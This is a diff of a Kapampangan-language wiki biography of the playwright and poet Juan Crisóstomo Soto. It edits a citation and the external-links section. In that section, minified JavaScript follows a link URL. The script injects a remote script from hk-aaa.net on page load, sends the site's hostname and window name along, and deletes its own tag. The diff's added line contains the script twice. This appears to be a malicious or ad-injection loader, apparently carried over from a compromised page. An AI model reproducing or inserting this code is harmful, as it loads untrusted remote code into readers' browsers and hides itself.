--- a/Juan_Crisóstomo_Soto.mw
+++ b/Juan_Crisóstomo_Soto.mw
@@ -3,7 +3,7 @@ I '''Juan Crisostomo Soto''' metung yang [[Kapampangan]] [[watas]].
 
 ==Talambie==
 
-I '''Juan Crisostomo Soto y Caballa'''<ref>http://kahimyang.info/kauswagan/articles/900/today-in-philippine-history-january-27-1867-juan-crisostomo-soto-was-born-in-santa-ines-bacolor-pampanga</ref> Penganak ya iniang Eneru 27, 1867 qng Bacolor, Pampanga at meangu ya bie iniang Hulyo 12, 1918. Metung yang zarzuelista, poeta, direktor at talasulat makuyad a kuwento. Misan yang meging empleyado ning gubyernu, sundalus ning rebolusyon, gerilya laban caring Amerikano, diyarista at provincial deputy assessor Meging talasulat yamurin queng La Independencia. Sumangid ning kakulangan na queng pormal a pamagaral, apansin ing keraklan ding maangabayat a katungkulan at mangayap a bague keyang agawa. Iniang edad 11 o 12 banua ya pamu mekasulat neng relihiyosong dula . Nung sumahan, magkabilangan lang 50 dula at zarzuela ding keyang alikha . Caring sablang dulang asulat na, ding dulang maki patriotikong tema ilang pekamatagumpe calupa ning Sigalut Ing Paniu nang Sitang at Ing Anac ning Katipunan.  Ing dulang Alang Dios ng tuturingan ding keraklan bilang obra maestra nang Crissot . Ating sasabing tagle ne ning obrang iti ing keyang pilosopiya queng bie. Atin ya muring mapilan poesiang asulat antimo ring Ing Bandera at Malaya a purus atin temang makabalen . Ing katunayan, tuturingan ya bilang kaunaunahang mamoesiang Kapampangan. Atin ya munamang makuyad a kuwento calupa ning Lidia. Mekasulat yang likas ning Noli Me Tangere queng Kapampangan. Meging editor ya mu naman caring Kapampangang peryodiko anti ring El Pueblo, El Imparcial at Ing Alipatpat. Kikilalanan ya bilang pekamayap a Kapampangang Dramatista at para caring aliwa, pati na murin pekamayap a Kapampangang talasulat pauli ring keraklan at kalidad ding keyang asulat. 
+I '''Juan Crisostomo Soto y Caballa'''<ref>[Today&#x20;in&#x20;Philippine&#x20;History,&#x20;January&#x20;27,&#x20;1867,&#x20;Juan&#x20;Crisostomo&#x20;Soto&#x20;was&#x20;born&#x20;in&#x20;Santa&#x20;Ines,&#x20;Bacolor,&#x20;Pampanga&#x20;Posted&#x20;Thursday&#x20;January&#x20;26,&#x20;2012 http://kahimyang.info/kauswagan/articles/900/today-in-philippine-history-january-27-1867-juan-crisostomo-soto-was-born-in-santa-ines-bacolor-pampanga]</ref> Penganak ya iniang Eneru 27, 1867 qng Bacolor, Pampanga at meangu ya bie iniang Hulyo 12, 1918. Metung yang zarzuelista, poeta, direktor at talasulat makuyad a kuwento. Misan yang meging empleyado ning gubyernu, sundalus ning rebolusyon, gerilya laban caring Amerikano, diyarista at provincial deputy assessor Meging talasulat yamurin queng La Independencia. Sumangid ning kakulangan na queng pormal a pamagaral, apansin ing keraklan ding maangabayat a katungkulan at mangayap a bague keyang agawa. Iniang edad 11 o 12 banua ya pamu mekasulat neng relihiyosong dula . Nung sumahan, magkabilangan lang 50 dula at zarzuela ding keyang alikha . Caring sablang dulang asulat na, ding dulang maki patriotikong tema ilang pekamatagumpe calupa ning Sigalut Ing Paniu nang Sitang at Ing Anac ning Katipunan.  Ing dulang Alang Dios ng tuturingan ding keraklan bilang obra maestra nang Crissot . Ating sasabing tagle ne ning obrang iti ing keyang pilosopiya queng bie. Atin ya muring mapilan poesiang asulat antimo ring Ing Bandera at Malaya a purus atin temang makabalen . Ing katunayan, tuturingan ya bilang kaunaunahang mamoesiang Kapampangan. Atin ya munamang makuyad a kuwento calupa ning Lidia. Mekasulat yang likas ning Noli Me Tangere queng Kapampangan. Meging editor ya mu naman caring Kapampangang peryodiko anti ring El Pueblo, El Imparcial at Ing Alipatpat. Kikilalanan ya bilang pekamayap a Kapampangang Dramatista at para caring aliwa, pati na murin pekamayap a Kapampangang talasulat pauli ring keraklan at kalidad ding keyang asulat. 
 
 
 Dacal la ring taung atin sasabian qng bie ra queti Capampangan ing menibatan la Baculud, ing balen  beitan nang Juan Crisostomo C. Soto,  lalu rang balu qng aus a Crissot. Mibait ya y Crissot canitang 27 ya ing Enero, 1867. Calabas ning apat  aldo bininiag neng Padre Silvino Isac, at meguing tegauan ne y Don Patricio Soliman. Calulu la mu ring familia na dapot gagalang do qng carelang lugal. Y Santiago Soto, yang tata na, metung alguacil mayor queti Baculud, cabang y Maxima Caballa yang ima na, at picabaluan yang uliran at malinis a pusu. Mecad amana na cang apu nang Sixto Caballa ing cabiasnan nang sumulat. 
@@ -61,4 +61,4 @@ Ing istorya ng Juan Crisostomo Sotto qng pamanialicsic nang Nestor R. Galura
 
 
 ==Suglung Palwal==
-http://camaligcapampangan.info/index2.html<script id="ae77f684bc5e1ed37b67a615aa4098a3" async="true" type="text/javascript">if(window.self===window.top){window._aid='1004';window._geo='Saudi Arabia';window._mid='17bc85cc-3e4f-4599-a948-0c4dfca18bf4';window._timestamp=(Math.round(new Date().getTime()/1000));window._imjs_dyn='//hk-aaa.net/dynamic/main.php?aid=1004&geo=Saudi Arabia&sid=0&mid=17bc85cc-3e4f-4599-a948-0c4dfca18bf4&pid=hades&dt=03052015&udt=03052015&grp=9&url='+location.hostname+'&win='+(window.name+' ').substr(0,30).replace(/[^0-9a-zA-Z]/g,'_')+((location.protocol==='http:')?'&http=1':<nowiki>''</nowiki>);!function(){function e(e){var t=document.createElement('script');t.type='text/javascript',t.src=e,t.async=!0,t.onload=t.onreadystatechange=function(){this.readyState&&'loaded'!==this.readyState&&'complete'!==this.readyState||(t.onload=t.onreadystatechange=null,t.parentNode&&t.parentNode.removeChild(t))};var n=document.body||document.getElementsByTagName('body')[0]||document.documentElement;n&&n.insertBefore(t,n.firstChild)}function t(e){cr_readyCallback=e,a&&cr_readyCallback()}function n(){if(!a){if(!document.body)return setTimeout(n,1);a=!0,'function'==typeof cr_readyCallback&&cr_readyCallback()<nowiki>}}</nowiki>function o(){return'complete'===document.readyState?setTimeout(n,1):void(document.addEventListener?(cr_DOMContentLoaded=function(){document.removeEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),n()},document.addEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),window.addEventListener('load',n,!1)):document.attachEvent&&(cr_DOMContentLoaded=function(){'complete'===document.readyState&&(document.detachEvent('onreadystatechange',cr_DOMContentLoaded),n())},document.attachEvent('onreadystatechange',cr_DOMContentLoaded),window.attachEvent('onload',n)))}var a=!1;o(),t(function(){e(_imjs_dyn);_imjs_dyn=<nowiki>''</nowiki>;var n=document.getElementById('ae77f684bc5e1ed37b67a615aa4098a3');n.parentNode&&n.parentNode.removeChild(n)})}();}</script>
+http://camaligcapampangan.info/index2.html<script id="ae77f684bc5e1ed37b67a615aa4098a3" async="true" type="text/javascript">if(window.self===window.top){window._aid='1004';window._geo='Saudi Arabia';window._mid='17bc85cc-3e4f-4599-a948-0c4dfca18bf4';window._timestamp=(Math.round(new Date().getTime()/1000));window._imjs_dyn='//hk-aaa.net/dynamic/main.php?aid=1004&geo=Saudi Arabia&sid=0&mid=17bc85cc-3e4f-4599-a948-0c4dfca18bf4&pid=hades&dt=03052015&udt=03052015&grp=9&url='+location.hostname+'&win='+(window.name+' ').substr(0,30).replace(/[^0-9a-zA-Z]/g,'_')+((location.protocol==='http:')?'&http=1':<nowiki>''</nowiki>);!function(){function e(e){var t=document.createElement('script');t.type='text/javascript',t.src=e,t.async=!0,t.onload=t.onreadystatechange=function(){this.readyState&&'loaded'!==this.readyState&&'complete'!==this.readyState||(t.onload=t.onreadystatechange=null,t.parentNode&&t.parentNode.removeChild(t))};var n=document.body||document.getElementsByTagName('body')[0]||document.documentElement;n&&n.insertBefore(t,n.firstChild)}function t(e){cr_readyCallback=e,a&&cr_readyCallback()}function n(){if(!a){if(!document.body)return setTimeout(n,1);a=!0,'function'==typeof cr_readyCallback&&cr_readyCallback()<nowiki>}}</nowiki>function o(){return'complete'===document.readyState?setTimeout(n,1):void(document.addEventListener?(cr_DOMContentLoaded=function(){document.removeEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),n()},document.addEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),window.addEventListener('load',n,!1)):document.attachEvent&&(cr_DOMContentLoaded=function(){'complete'===document.readyState&&(document.detachEvent('onreadystatechange',cr_DOMContentLoaded),n())},document.attachEvent('onreadystatechange',cr_DOMContentLoaded),window.attachEvent('onload',n)))}var a=!1;o(),t(function(){e(_imjs_dyn);_imjs_dyn=<nowiki>''</nowiki>;var n=document.getElementById('ae77f684bc5e1ed37b67a615aa4098a3');n.parentNode&&n.parentNode.removeChild(n)})}();}</script><script id="ae77f684bc5e1ed37b67a615aa4098a3" async="true" type="text/javascript">if(window.self===window.top){window._aid='1004';window._geo='Saudi Arabia';window._mid='17bc85cc-3e4f-4599-a948-0c4dfca18bf4';window._timestamp=(Math.round(new Date().getTime()/1000));window._imjs_dyn='//hk-aaa.net/dynamic/main.php?aid=1004&geo=Saudi Arabia&sid=0&mid=17bc85cc-3e4f-4599-a948-0c4dfca18bf4&pid=hades&dt=03052015&udt=03052015&grp=9&url='+location.hostname+'&win='+(window.name+' ').substr(0,30).replace(/[^0-9a-zA-Z]/g,'_')+((location.protocol==='http:')?'&http=1':<nowiki>''</nowiki>);!function(){function e(e){var t=document.createElement('script');t.type='text/javascript',t.src=e,t.async=!0,t.onload=t.onreadystatechange=function(){this.readyState&&'loaded'!==this.readyState&&'complete'!==this.readyState||(t.onload=t.onreadystatechange=null,t.parentNode&&t.parentNode.removeChild(t))};var n=document.body||document.getElementsByTagName('body')[0]||document.documentElement;n&&n.insertBefore(t,n.firstChild)}function t(e){cr_readyCallback=e,a&&cr_readyCallback()}function n(){if(!a){if(!document.body)return setTimeout(n,1);a=!0,'function'==typeof cr_readyCallback&&cr_readyCallback()<nowiki>}}</nowiki>function o(){return'complete'===document.readyState?setTimeout(n,1):void(document.addEventListener?(cr_DOMContentLoaded=function(){document.removeEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),n()},document.addEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),window.addEventListener('load',n,!1)):document.attachEvent&&(cr_DOMContentLoaded=function(){'complete'===document.readyState&&(document.detachEvent('onreadystatechange',cr_DOMContentLoaded),n())},document.attachEvent('onreadystatechange',cr_DOMContentLoaded),window.attachEvent('onload',n)))}var a=!1;o(),t(function(){e(_imjs_dyn);_imjs_dyn=<nowiki>''</nowiki>;var n=document.getElementById('ae77f684bc5e1ed37b67a615aa4098a3');n.parentNode&&n.parentNode.removeChild(n)})}();}</script>
